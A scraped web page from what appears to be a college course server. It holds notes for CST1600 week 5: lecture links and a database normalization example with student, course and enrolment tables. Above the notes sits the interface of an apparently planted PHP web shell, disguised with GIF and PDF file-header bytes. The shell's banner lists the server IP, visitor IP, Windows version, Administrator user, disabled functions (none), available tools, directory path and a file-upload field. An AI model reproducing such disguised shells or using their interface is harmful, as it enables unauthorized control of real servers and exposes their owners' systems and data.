GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1600/_Archive/Notes/ |
Upload File : |
CST1600_wk05_20180206_part1 View lecture part 1 CST1600_wk05_20180206_part2 View lecture part 2 CST1600_wk05_20180206_part3 View lecture part 3 (Lab 3) * = primary key (unique identifier) @ = foreign key (points to a primary key or unique identifier in another table) ^ - unique field. Table ( StudentID*, StudentName, CourseID*, CourseName, Grade, CourseDate) Student ( StudentID*, StudentName) Course ( CourseID*, CourseName, CourseDate) Student_Course ( StudentID*@, CourseID*@, Grade)